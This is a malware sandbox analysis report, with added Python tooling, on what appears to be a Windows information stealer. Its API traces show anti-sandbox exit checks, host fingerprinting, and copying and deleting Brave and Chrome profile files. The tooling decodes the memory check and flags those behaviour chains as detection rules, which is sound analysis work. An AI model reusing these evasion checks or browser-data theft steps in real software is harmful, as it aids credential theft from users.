                            • Instruction ID: 9a19797f1418511b03baf722d700607c6245020c8aaec77932ceca88d707ad7f
                            • Opcode Fuzzy Hash: ce0c6f00ce4a5c73a28ed25031f023cb2cb441e63d4b49a40aef3a464ea908a6
                            • Instruction Fuzzy Hash: DA012D71D00218AFDB10DFA9EC45B9EBBB8EB48364F00412AF914E7390DBB499048FD4

                            Control-flow Graph
                            • Function 431030-4310b6 (graph image not rendered): blocks call GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc and VirtualFree.
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00431046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 0043104D
                            • ExitProcess.KERNEL32 ref: 00431058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0043106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 004310AB
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 1803ec1ebb426f48a60d01856619e6202f644587dbaec05cf5b102e7cfd0eb27
                            • Instruction ID: 7e0e8af47752e2a02b69e278021f9486144b8e099cd26fdd56a9a1e83efff4b0
                            • Opcode Fuzzy Hash: 1803ec1ebb426f48a60d01856619e6202f644587dbaec05cf5b102e7cfd0eb27
                            • Instruction Fuzzy Hash: 7E01F4717402047BEB244A75AC1AF6B77AEA789B05F30A019FB05E73D0D9F5E9008A78

                            Control-flow Graph
                            • Function 44ee90-44efa0 (graph image not rendered): blocks call lstrcpy and StrCmpCA, plus subroutines 432930, 436c40 and 432a20 (the latter 10 times in one block).
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044EEC3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0044EEDE
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0044EF3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: a086d9542672e710ddb60140fbb5683c3ff5bdd2e9564af2aa99fd25f0bf4cc0
                            • Instruction ID: bc9b629cec51bc3711470c4d5c61012339becdf2c63c1a1bc0b53efc7b1dfef2
                            • Opcode Fuzzy Hash: a086d9542672e710ddb60140fbb5683c3ff5bdd2e9564af2aa99fd25f0bf4cc0
                            • Instruction Fuzzy Hash: EF2146707202059BDB21FF7ADD4669F77A4BF14304F10642EB84ADB212DA78EC048798

                            Control-flow Graph (rendered graph not reproduced): function at 0x4310C0. The block 0x4310DE-0x4310F3 calls GlobalMemoryStatusEx; one successor (0x431112) calls ExitProcess, the other (0x4310F5-0x431110) either continues to 0x43111A or also reaches the ExitProcess block. A GlobalMemoryStatusEx result that gates ExitProcess is the pattern of a RAM-size sandbox check (analysis VMs are often provisioned with little memory); the threshold constant the sample compares against is not shown in this report.
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: e9cda86cbf272b8913d3592ce8b0ad6102a7bb868bf1527b3eee94f7d29cb645
                            • Instruction ID: fc61dbedbc502bd342af2b5950f01ba6a8194f1c6836e0a7f2850d835ba078ed
                            • Opcode Fuzzy Hash: e9cda86cbf272b8913d3592ce8b0ad6102a7bb868bf1527b3eee94f7d29cb645
                            • Instruction Fuzzy Hash: 0DF02E7010424447EF146A64D94535EF7D9E70E350F10253BDEA6C22F1E278C840813F
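                            Added example (editor's code, not part of the Joe Sandbox report or the sample): a decoder for the MEMORYSTATUSEX structure that GlobalMemoryStatusEx fills in, plus a model of the ExitProcess gate seen in the graph above. Two assumptions are labelled in the code: the compared field is ullTotalPhys (the graph does not name it), and the 4 GiB threshold is invented, since the report does not show the constant. The struct layout itself is the documented Win32 one. This lets an analyst decode the buffer from a memory dump and see which way the branch would go on a given host.

```python
import struct

# Layout of MEMORYSTATUSEX (64 bytes), the structure GlobalMemoryStatusEx fills in.
# Field order and widths follow the Win32 definition: little-endian, no padding.
_FMT = "<IIQQQQQQQ"
FIELDS = (
    "dwLength", "dwMemoryLoad", "ullTotalPhys", "ullAvailPhys",
    "ullTotalPageFile", "ullAvailPageFile", "ullTotalVirtual",
    "ullAvailVirtual", "ullAvailExtendedVirtual",
)
MEMORYSTATUSEX_SIZE = struct.calcsize(_FMT)  # 64

# Assumption: the report does not show the constant the sample compares against;
# 4 GiB is used here only to make the gate concrete.
ASSUMED_MIN_TOTAL_PHYS = 4 * 1024 ** 3


def build_memorystatusex(total_phys: int, avail_phys: int = None, memory_load: int = 50) -> bytes:
    """Pack a MEMORYSTATUSEX the way a successful GlobalMemoryStatusEx call would (constructed test data)."""
    if avail_phys is None:
        avail_phys = total_phys // 2
    page_total = total_phys * 2
    page_avail = page_total - (total_phys - avail_phys)
    return struct.pack(_FMT, MEMORYSTATUSEX_SIZE, memory_load, total_phys, avail_phys,
                       page_total, page_avail, 0x7FFE0000, 0x7FF00000, 0)


def is_valid_memorystatusex(buf: bytes) -> bool:
    """dwLength must equal sizeof(MEMORYSTATUSEX); otherwise the API fails and the rest is garbage."""
    return len(buf) >= MEMORYSTATUSEX_SIZE and struct.unpack_from("<I", buf)[0] == MEMORYSTATUSEX_SIZE


def parse_memorystatusex(buf: bytes) -> dict:
    """Decode a raw buffer (e.g. carved from a dump) into named fields."""
    if not is_valid_memorystatusex(buf):
        raise ValueError("not an initialised MEMORYSTATUSEX (dwLength != 64)")
    return dict(zip(FIELDS, struct.unpack_from(_FMT, buf)))


def ram_gate_would_exit(buf: bytes, min_total_phys: int = ASSUMED_MIN_TOTAL_PHYS) -> bool:
    """Model of the GlobalMemoryStatusEx -> ExitProcess branch: True when the sample would terminate.

    Assumption: the compared field is ullTotalPhys (the usual choice; the graph does not name it).
    """
    return parse_memorystatusex(buf)["ullTotalPhys"] < min_total_phys


def describe(buf: bytes) -> str:
    """One-line summary of a decoded buffer and the branch outcome."""
    rec = parse_memorystatusex(buf)
    gib = lambda v: v / 1024 ** 3
    verdict = "EXIT" if ram_gate_would_exit(buf) else "continue"
    return (f"load={rec['dwMemoryLoad']}% total={gib(rec['ullTotalPhys']):.1f}GiB "
            f"avail={gib(rec['ullAvailPhys']):.1f}GiB -> {verdict}")


if __name__ == "__main__":
    for total in (2 * 1024 ** 3, 16 * 1024 ** 3):  # a lean sandbox VM vs. a typical desktop
        print(describe(build_memorystatusex(total)))
```

                            When running a sample like this in a sandbox, give the VM enough physical memory that the comparison passes; the decoder is also handy for checking what value the guest actually reports, which is what the sample sees.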

                            Control-flow Graph (rendered graph not reproduced): function at 0x448C88. The entry block 0x448C88-0x448CC4 calls StrCmpCA and, depending on the result, goes straight to ExitProcess at 0x448CC6. Otherwise a loop (0x448CF6, 0x448EC3-0x448EDC) dispatches from 0x448CFF over a table of cases, each of which is either a StrCmpCA against a fixed string or an lstrlen followed by calls to 0x432A20 / 0x432930; a final path at 0x448EBB calls lstrcpy before the function leaves through 0x448EE2 (call 0x432A20). Together with the string "block" in the Similarity record, this is a string-comparison loop whose entry comparison decides whether the process exits.
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: c66ed4dd19b8a7f67e4c7f6d7fbf9cc3c421d02007dbb3de9a608e36fc8bd856
                            • Instruction ID: 66136d71e5f3fdd0ed8eb61edf8508efd8aea09e3235a6ca4fc3bfac7046a5a2
                            • Opcode Fuzzy Hash: c66ed4dd19b8a7f67e4c7f6d7fbf9cc3c421d02007dbb3de9a608e36fc8bd856
                            • Instruction Fuzzy Hash: 66E01A78601209EFDB24DBA9D984D2A77ADEF58700B01146DFA009B7A2DA74ED00C76A

                            Control-flow Graph (rendered graph not reproduced): function at 0x452AD0, a single block 0x452AD0-0x452B22 that calls GetProcessHeap, RtlAllocateHeap and GetComputerNameA and then branches to 0x452B44 or 0x452B24. With the APIs listed below this is host fingerprinting: a 0x104-byte (MAX_PATH) heap buffer receives the NetBIOS computer name.
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00452AFF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00452B06
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00452B1A
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 8e07a998aff03f5423099b5733487d8bf9243b9f6ccf324b35a55147f7ce14ff
                            • Instruction ID: 5ea8a999c92447e37b5d30737b9f35c94039e8d365f78dbb13d987e5ef9f8cda
                            • Opcode Fuzzy Hash: 8e07a998aff03f5423099b5733487d8bf9243b9f6ccf324b35a55147f7ce14ff
                            • Instruction Fuzzy Hash: 2301A272A44608ABCB10CF99ED45B9AF7BCF745B21F00026BFD15D3780D7B8190486A5
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004423D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004423F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00442402
                            • lstrlen.KERNEL32(\*.*), ref: 0044240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00442436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00442486
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: ee15be7aa53c9f93506023f35057704dc12838680b04e1eec301e3214e7a44c5
                            • Instruction ID: 08d01d66afb0d3759a98f2839877cb1fc1956f4ac1919d20a8d9ec53cc8035fa
                            • Opcode Fuzzy Hash: ee15be7aa53c9f93506023f35057704dc12838680b04e1eec301e3214e7a44c5
                            • Instruction Fuzzy Hash: BBA2A271A002169FEB21AF75CE88AAF77B9AF04704F54512AF845E3351DBB8DD018B68
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004316E2
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00431719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043176C
                            • lstrcat.KERNEL32(00000000), ref: 00431776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004317A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004317EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004317F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431875
                            • lstrcat.KERNEL32(00000000), ref: 0043187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004318AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 004318F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004318FE
                            • lstrlen.KERNEL32(00461794), ref: 00431909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431929
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431966
                            • lstrlen.KERNEL32(\*.*), ref: 00431971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 0043199A
                              • Part of subcall function 00454040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0045406D
                              • Part of subcall function 00454040: lstrcpy.KERNEL32(00000000,?), ref: 004540A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004319C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431A16
                            • lstrlen.KERNEL32(00461794), ref: 00431A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431A41
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431A81
                            • lstrlen.KERNEL32(00461794), ref: 00431A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431AAC
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00431B45
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 00431B70
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 00431B8A
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00431BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431C03
                            • lstrlen.KERNEL32(00461794), ref: 00431C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431C31
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431C74
                            • lstrlen.KERNEL32(00461794), ref: 00431C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431CA2
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431CAE
                            • lstrlen.KERNEL32(?), ref: 00431CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00431CE9
                            • lstrlen.KERNEL32(00461794), ref: 00431CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431D14
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431DEB
                            • lstrlen.KERNEL32(00461794), ref: 00431DF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431E19
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431E56
                            • lstrlen.KERNEL32(00461794), ref: 00431E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431E81
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431E8D
                            • lstrlen.KERNEL32(?), ref: 00431E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 00431EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00431F45
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00431F9F
                            • lstrlen.KERNEL32(00FF91A0), ref: 00431FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00431FE3
                            • lstrlen.KERNEL32(00461794), ref: 00431FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043200E
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00432042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043204D
                            • lstrlen.KERNEL32(00461794), ref: 00432058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432075
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00432081
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: e0894bab9d36882fcf059d2d1c0c14b608198725a1287ae96436ef4a4f720bd4
                            • Instruction ID: 845857960eb6a0b2ceaff002e4eb1890ce0b9b7290119d8ae37515d2855bbdec
                            • Opcode Fuzzy Hash: e0894bab9d36882fcf059d2d1c0c14b608198725a1287ae96436ef4a4f720bd4
                            • Instruction Fuzzy Hash: 7A929771A012169FCB21EF75DD84AAF77B9AF08304F14612AF805A7361DBB8DD05CBA4
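                            Added example (editor's code, not part of the Joe Sandbox report or the sample): a parser for the report's "APIs" line format ("api.MODULE(args), ref: ADDRESS", optionally prefixed with "Part of subcall function") that orders calls by call-site address, extracts the string literals the sandbox resolved, and flags the behaviour chains seen in the records above: GlobalMemoryStatusEx gating ExitProcess, a heap buffer handed to GetComputerNameA, lstrcat of "\*.*" feeding FindFirstFileA, and a CopyFileA following a directory walk. The rule names and gap sizes are this example's own choices; the sample input is constructed in the report's format, and the call-site addresses on its two memory-check lines are illustrative, since the report shows that function only as a graph.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

# One "APIs" line of the report: "• api.MODULE(arg,arg,...), ref: ADDRESS",
# optionally prefixed with "Part of subcall function XXXXXXXX:".
CALL_RE = re.compile(
    r"^\W*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # owning function when the report marks the call as a subcall


def parse_calls(text: str) -> List[ApiCall]:
    """Parse report lines into calls ordered by call-site address (string args are assumed comma-free)."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args = m["args"].split(",") if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    calls.sort(key=lambda c: c.ref)
    return calls


def literal_args(calls: List[ApiCall]) -> List[str]:
    """Arguments the sandbox resolved to strings: everything that is not '?' or a raw 8-hex pointer."""
    seen: List[str] = []
    for c in calls:
        for a in c.args:
            if a and a != "?" and not HEX8.match(a) and a not in seen:
                seen.append(a)
    return seen


Step = Tuple[str, Optional[Callable[[ApiCall], bool]]]


def _step_ok(call: ApiCall, step: Step) -> bool:
    name, pred = step
    return call.api == name and (pred is None or pred(call))


def match_chain(calls: List[ApiCall], steps: List[Step], max_gap: int) -> List[Tuple[int, ...]]:
    """Every occurrence of `steps` in address order, each step within `max_gap` calls of the previous one."""
    hits = []
    for i, first in enumerate(calls):
        if not _step_ok(first, steps[0]):
            continue
        refs, pos = [first.ref], i
        for step in steps[1:]:
            window = range(pos + 1, min(len(calls), pos + 1 + max_gap))
            pos = next((j for j in window if _step_ok(calls[j], step)), -1)
            if pos < 0:
                break
            refs.append(calls[pos].ref)
        else:
            hits.append(tuple(refs))
    return hits


def _appends_wildcard(call: ApiCall) -> bool:
    return any(a.endswith("\\*.*") for a in call.args)


# Behaviour chains worth flagging in a stealer report (labels and gap sizes are this example's own).
RULES = {
    "ram_size_gate":        ([("GlobalMemoryStatusEx", None), ("ExitProcess", None)], 3),
    "host_fingerprint":     ([("RtlAllocateHeap", None), ("GetComputerNameA", None)], 2),
    "directory_walk":       ([("lstrcat", _appends_wildcard), ("FindFirstFileA", None)], 6),
    "file_copy_after_walk": ([("FindFirstFileA", None), ("CopyFileA", None)], 200),
}


def scan(text: str) -> dict:
    """Rule name -> list of (call-site, ...) tuples; rules with no hits are omitted."""
    calls = parse_calls(text)
    found = {name: match_chain(calls, steps, gap) for name, (steps, gap) in RULES.items()}
    return {k: v for k, v in found.items() if v}


# Constructed input in the report's line format; the two memory-check addresses are illustrative.
SAMPLE_REPORT = r"""
• GlobalMemoryStatusEx.KERNEL32(?), ref: 004310E8
• ExitProcess.KERNEL32(00000000), ref: 00431112
• GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00452AFF
• RtlAllocateHeap.NTDLL(00000000), ref: 00452B06
• GetComputerNameA.KERNEL32(00000000,00000104), ref: 00452B1A
• lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004423D4
• lstrlen.KERNEL32(\*.*), ref: 0044240D
• lstrcat.KERNEL32(00000000,\*.*), ref: 00442436
• lstrcpy.KERNEL32(00000000,00000000), ref: 0044246A
• FindFirstFileA.KERNEL32(00000000,?), ref: 00442486
  • Part of subcall function 00454040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0045406D
• FindFirstFileA.KERNEL32(00000000,?), ref: 0043DCD0
• StrCmpCA.SHLWAPI(?,Brave), ref: 0043E0CD
• CopyFileA.KERNEL32(00000000,?,00000001), ref: 0043E1F9
• lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0043E2A7
"""

if __name__ == "__main__":
    for name, hits in scan(SAMPLE_REPORT).items():
        print(name, [tuple(f"0x{r:X}" for r in h) for h in hits])
    print("strings:", literal_args(parse_calls(SAMPLE_REPORT)))
```

                            Sorting by call-site address approximates execution order only within one function; the gap limits keep a chain from spanning unrelated code, which is why the walk-then-copy rule uses a wide window and the memory gate a narrow one.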
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DBEF
                            • lstrlen.KERNEL32(00464CA8), ref: 0043DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DC17
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 0043DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DC4C
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DC8F
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0043DCD0
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0043DCF0
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0043DD0A
                            • lstrlen.KERNEL32(0045CFEC), ref: 0043DD1D
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DD7B
                            • lstrlen.KERNEL32(00461794), ref: 0043DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DDA3
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DDAF
                            • lstrlen.KERNEL32(?), ref: 0043DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 0043DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DE19
                            • lstrlen.KERNEL32(00461794), ref: 0043DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043DE6F
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DE7B
                            • lstrlen.KERNEL32(00FF9370), ref: 0043DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DEBB
                            • lstrlen.KERNEL32(00461794), ref: 0043DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043DEE6
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DEF2
                            • lstrlen.KERNEL32(00FF91B0), ref: 0043DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DFA5
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DFB1
                            • lstrlen.KERNEL32(00FF9370), ref: 0043DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DFF4
                            • lstrlen.KERNEL32(00461794), ref: 0043DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E022
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043E02E
                            • lstrlen.KERNEL32(00FF91B0), ref: 0043E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 0043E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 0043E0E7
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043E11F
                            • lstrlen.KERNEL32(00FFDC48), ref: 0043E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E155
                            • lstrcat.KERNEL32(00000000,?), ref: 0043E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E19F
                            • lstrcat.KERNEL32(00000000), ref: 0043E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0043E1F9
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043E22F
                            • lstrlen.KERNEL32(00FF91A0), ref: 0043E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E261
                            • lstrcat.KERNEL32(00000000,00FF91A0), ref: 0043E269
                            • lstrlen.KERNEL32(\Brave\Preferences), ref: 0043E274
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E29B
                            • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0043E2A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E2CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E30F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E349
                            • DeleteFileA.KERNEL32(?), ref: 0043E381
                            • StrCmpCA.SHLWAPI(?,00FFDCC0), ref: 0043E3AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E3F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E41C
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E445
                            • StrCmpCA.SHLWAPI(?,00FF91B0), ref: 0043E468
                            • StrCmpCA.SHLWAPI(?,00FF9370), ref: 0043E47D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E4D9
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0043E4E0
                            • StrCmpCA.SHLWAPI(?,00FFDC00), ref: 0043E58E
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043E5C4
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0043E639
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E678
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E6A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E6C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E70E
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E737
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E75C
                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0043E776
                            • DeleteFileA.KERNEL32(?), ref: 0043E7D2
                            • StrCmpCA.SHLWAPI(?,00FF9240), ref: 0043E7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E88C
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E8B5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E8EE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E916
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E952
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
